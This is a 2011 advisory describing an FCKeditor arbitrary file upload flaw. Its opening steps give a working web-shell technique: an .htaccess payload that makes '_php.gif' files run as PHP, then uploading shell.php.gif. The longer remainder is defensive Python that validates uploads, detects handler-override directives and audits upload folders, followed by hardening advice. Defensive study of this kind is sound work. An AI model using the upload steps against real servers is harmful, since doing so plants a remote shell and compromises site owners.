FCKeditor upload vulnerability (all PHP versions)
Author: Anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
# Any file whose name contains "_php.gif" is handed to the PHP interpreter
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess file with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available on the server.
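Defensive checks against the two weaknesses this procedure chains together, added here as an illustration; this is not code from the advisory or from FCKeditor, and every function name and sample input below is constructed. The validator for an image upload handler rejects dotfiles such as .htaccess, rejects names that carry a script or config marker in any position (so both "shell.php.gif" and its renamed form "shell_php.gif" are refused, which a suffix-only check would miss), and requires the file's leading bytes to agree with the declared image type. A small audit function then flags an .htaccess with handler directives already sitting in an upload directory.

```python
"""Defensive checks for an image-upload handler, modelled on the two weaknesses
chained in the advisory above: an attacker-supplied .htaccess in the upload
directory and a sanitiser that rewrites "shell.php.gif" to "shell_php.gif".
Illustrative code, not FCKeditor's; names and sample data are constructed."""
from __future__ import annotations

import re
from pathlib import PurePosixPath

# Only these extensions may be stored, and only when the bytes agree with them.
ALLOWED_EXT = {"gif", "jpg", "jpeg", "png"}
MAGIC = [
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
]
# A script/config marker anywhere in the name, delimited by . _ - or the string
# ends, so "shell.php.gif" and the renamed "shell_php.gif" are both caught.
SCRIPT_TOKEN = re.compile(
    r"(?i)(?:^|[._-])(?:php\d*|phtml|phar|asp|aspx|jsp|cgi|pl|htaccess)(?:$|[._-])"
)
# Apache directives that change how files in a directory are interpreted.
HANDLER_DIRECTIVE = re.compile(
    r"(?im)^\s*(?:SetHandler|AddHandler|AddType|ForceType|php_value|php_flag)\b"
)


def validate_upload(filename: str, head: bytes) -> tuple[bool, str]:
    """Decide whether an uploaded file may be stored; head is its first bytes."""
    name = PurePosixPath(filename).name  # discard any directory components
    if not name or name.startswith("."):
        return False, "dotfile or empty name (e.g. .htaccess)"
    if SCRIPT_TOKEN.search(name):
        return False, "script or config marker in filename"
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    ext = parts[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    detected = next((kind for magic, kind in MAGIC if head.startswith(magic)), None)
    if detected is None:
        return False, "content does not start with a known image signature"
    if detected != ("jpg" if ext == "jpeg" else ext):
        return False, f"extension {ext!r} disagrees with content {detected!r}"
    return True, "ok"


def htaccess_is_dangerous(text: str) -> bool:
    """True when an .htaccess body rewires how the directory's files execute."""
    return HANDLER_DIRECTIVE.search(text) is not None


def audit_upload_dir(files: dict[str, bytes]) -> list[str]:
    """Detection pass over an existing upload directory (name -> content)."""
    findings = []
    for name, data in files.items():
        if name == ".htaccess":
            if htaccess_is_dangerous(data.decode("latin-1")):
                findings.append(f"{name}: handler override directive present")
            else:
                findings.append(f"{name}: .htaccess should not exist in upload dir")
        elif SCRIPT_TOKEN.search(name):
            findings.append(f"{name}: script marker in filename")
    return findings


if __name__ == "__main__":
    # Constructed samples mirroring the advisory's steps.
    HTACCESS = b'<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'
    GIF = b"GIF89a" + b"\x00" * 16
    for fname, head in [
        (".htaccess", HTACCESS),
        ("shell.php.gif", b"<?php /* not an image */ ?>"),
        ("shell_php.gif", GIF),
        ("photo.gif", GIF),
        ("photo.gif", b"<?php /* not an image */ ?>"),
    ]:
        print(f"{fname:16} -> {validate_upload(fname, head)}")
    for finding in audit_upload_dir({".htaccess": HTACCESS, "shell_php.gif": GIF, "photo.gif": GIF}):
        print("AUDIT:", finding)
```

Filename and content validation alone is not enough: the upload directory should also be served with per-directory overrides disabled (for Apache, AllowOverride None on that directory) and with no script handler mapped there, so that an .htaccess which does reach the disk changes nothing about how "shell_php.gif" is served.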